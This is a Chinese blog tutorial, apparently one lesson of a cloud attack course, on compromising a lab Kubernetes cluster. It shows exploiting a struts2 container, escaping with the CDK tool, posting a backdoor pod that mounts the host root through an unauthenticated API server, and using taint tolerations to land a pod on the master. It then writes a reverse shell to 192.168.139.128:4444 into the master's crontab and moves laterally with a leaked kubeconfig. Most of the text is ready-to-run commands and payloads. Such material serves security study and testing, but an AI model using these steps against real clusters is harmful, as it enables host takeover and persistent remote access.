【第99课】云原生篇&K8s安全&实战场景&攻击Pod&污点Taint&横向移动&容器逃逸

Lucker_YYY

已于 2024-09-03 11:33:32 修改

阅读量1.4k

点赞数 60

分类专栏：（九）云上攻防文章标签：云原生 kubernetes 安全

于 2024-09-03 10:28:16 首次发布

本文链接：https://blog.csdn.net/Lucker_YYY/article/details/141854780

版权

（九）云上攻防专栏收录该内容

8 篇文章 0 订阅

订阅专栏

免责声明

本文发布的工具和脚本，仅用作测试和学习研究，禁止用于商业用途，不能保证其合法性，准确性，完整性和有效性，请根据情况自行判断。

如果任何单位或个人认为该项目的脚本可能涉嫌侵犯其权利，则应及时通知并提供身份证明，所有权证明，我们将在收到认证文件后删除相关内容。

文中所涉及的技术、思路及工具等相关知识仅供安全为目的的学习使用，任何人不得将其应用于非法用途及盈利等目的，间接使用文章中的任何工具、思路及技术，我方对于由此引起的法律后果概不负责。

知识点

1、云原生-K8s安全-横向移动-污点Taint
2、云原生-K8s安全-Kubernetes实战场景

章节点：
云场景攻防：公有云，私有云，混合云，虚拟化集群，云桌面等
云厂商攻防：阿里云，腾讯云，华为云，亚马云，谷歌云，微软云等
云服务攻防：对象存储，云数据库，弹性计算服务器，VPC&RAM等
云原生攻防：Docker，Kubernetes(k8s)，容器逃逸，CI/CD等

在这里插入图片描述

一个集群包含三个节点，其中包括一个控制节点和两个工作节点

K8s-master 192.168.139.130
K8s-node1 192.168.139.131
K8s-node2 192.168.139.132

在这里插入图片描述

一、演示案例-云原生-K8s安全-横向移动-污点Taint

如何判断实战中能否利用污点Taint？

设置污点

kubectl taint nodes node1 xtz=value1:NoSchedule

去除污点

kubectl taint nodes node1 xtz:NoSchedule-

节点说明中，查找 Taints 字段

拿到node节点权限时可以查看其他node主机或者master主机是否支持用Taint污点横向移动

kubectl describe nodes node-name

在这里插入图片描述

二、演示案例-云原生-K8s安全-Kubernetes实战场景

在这里插入图片描述

1、攻击Pod部署Web应用

Web应用部署：（struts2漏洞）

拉取靶场镜像

kubectl create deployment xiaodi --image=vulhub/struts2:2.3.28

在这里插入图片描述

查看pod容器的状态(归属节点、内部IP、运行状态等)

 kubectl get pods -o wide

在这里插入图片描述

启动靶场镜像服务

kubectl expose deploy xiaodi --port=8080 --target-port=8080 --type=NodePort

在这里插入图片描述

kubectl get pod,svc

在这里插入图片描述

利用Web漏洞拿下权限

在这里插入图片描述

探针当前Webshell环境是否是docker容器

两种情况：

1、纯在docker容器里
2、在k8s下的某个主机里的docker容器

在这里插入图片描述

ls -al /

在这里插入图片描述
但是这还没完，因为这个docker容器有很大可能会在k8s下面

cat /proc/1/cgroup

在这里插入图片描述

docker逃逸

在这里插入图片描述
工具地址：GitHub - cdk-team/CDK: 📦 Make security testing of K8s, Docker, and Containerd easier.

2、利用k8s-Api-Server未授权提交创建后门Pod

在这里插入图片描述

./cdk_linux_amd64 kcurl anonymous post 'https://10.96.0.1:443/api/v1/namespaces/default/pods/' '{"apiVersion":"v1","kind":"Pod","metadata":{"annotations":{"kubectl.kubernetes.io/last-applied-configuration":"{\"apiVersion\":\"v1\",\"kind\":\"Pod\",\"metadata\":{\"annotations\":{},\"name\":\"test02\",\"namespace\":\"default\"},\"spec\":{\"containers\":[{\"image\":\"nginx:1.14.2\",\"name\":\"test02\",\"volumeMounts\":[{\"mountPath\":\"/host\",\"name\":\"host\"}]}],\"volumes\":[{\"hostPath\":{\"path\":\"/\",\"type\":\"Directory\"},\"name\":\"host\"}]}}\n"},"name":"test02","namespace":"default"},"spec":{"containers":[{"image":"nginx:1.14.2","name":"test02","volumeMounts":[{"mountPath":"/host","name":"host"}]}],"volumes":[{"hostPath":{"path":"/","type":"Directory"},"name":"host"}]}}'

在这里插入图片描述
或者

./kubectl -s 10.96.0.1:443 create -f test.yaml
//test.yam就是{"apiVersion":"v1","kind":"Pod","metadata":{"annotations":{"kubectl.kubernetes.io/last-applied-configuration":"{\"apiVersion\":\"v1\",\"kind\":\"Pod\",\"metadata\":{\"annotations\":{},\"name\":\"test02\",\"namespace\":\"default\"},\"spec\":{\"containers\":[{\"image\":\"nginx:1.14.2\",\"name\":\"test02\",\"volumeMounts\":[{\"mountPath\":\"/host\",\"name\":\"host\"}]}],\"volumes\":[{\"hostPath\":{\"path\":\"/\",\"type\":\"Directory\"},\"name\":\"host\"}]}}\n"},"name":"test02","namespace":"default"},"spec":{"containers":[{"image":"nginx:1.14.2","name":"test02","volumeMounts":[{"mountPath":"/host","name":"host"}]}],"volumes":[{"hostPath":{"path":"/","type":"Directory"},"name":"host"}]}}的值

查看后门pod是否创建

curl -k https://10.96.0.1:443/api/v1/namespaces/default/pods

在这里插入图片描述

3、实现挂载目录宿主机逃逸

在这里插入图片描述

加参数绕过交互式

./kubectl --server=https://10.96.0.1:443 --insecure-skip-tls-verify=true --username=a --password=a get pods

在这里插入图片描述

./kubectl --server=https://10.96.0.1:443 --insecure-skip-tls-verify=true --username=a --password=a exec test02 -- bash -c "ls /host"
//host目录就是挂载目录，相当于宿主机的/目录，可以自定义的。

在这里插入图片描述

4、利用污点Taint横向移动

参考：https://cn-sec.com/archives/1336486.html

获取node节点详情

./kubectl --server=https://10.96.0.1:443 --insecure-skip-tls-verify=true --username=a --password=a describe nodes | grep Taints

在这里插入图片描述
或者

./kubectl --server=https://10.96.0.1:443 --insecure-skip-tls-verify=true --username=a --password=a describe nodes

在这里插入图片描述

cat > x.yaml << EOF
apiVersion: v1
kind: Pod
metadata:
  name: control-master-xiaodi  //自定义
spec:
 tolerations:
   - key: node-role.kubernetes.io/master  //这里要修改
     operator: Exists
     effect: NoSchedule
 containers:
   - name: control-master-xiaodi //自定义
     image: ubuntu:18.04
     command: ["/bin/sleep", "3650d"]
     volumeMounts:
      - name: master
        mountPath: /master //自定义
 volumes:
  - name: master
    hostPath:
     path: /
     type: Directory
EOF

在这里插入图片描述

创建一个新pod容器

./kubectl --server=https://10.96.0.1:443 --insecure-skip-tls-verify=true --username=a --password=a create -f ./x.yaml

在这里插入图片描述

查看新建pod容器归属

./kubectl --server=https://10.96.0.1:443 --insecure-skip-tls-verify=true --username=a --password=a get pods -o wide

利用新建pod容器进行逃逸

./kubectl --server=https://10.96.0.1:443 --insecure-skip-tls-verify=true --username=a --password=a exec control-master -- bash -c "ls /master"

在这里插入图片描述

反弹master控制端的shell

echo -e '* * * * * root bash -i >& /dev/tcp/192.168.139.128/4444 0>&1\n' >> /master/etc/crontab
//这里的master路径要注意与上面一致

在这里插入图片描述

5、利用Config泄漏横向移动

也可以利用节点泄漏的config横向移动节点
在这里插入图片描述

./kubectl -s https://10.96.0.1:443/ --kubeconfig=config --insecure-skip-tls-verify=true get nodes

./kubectl apply -f test.yaml -n default --kubeconfig=config

./kubectl -n default --kubeconfig=config exec xiaodisec -- bash -c "ls /mnt/root"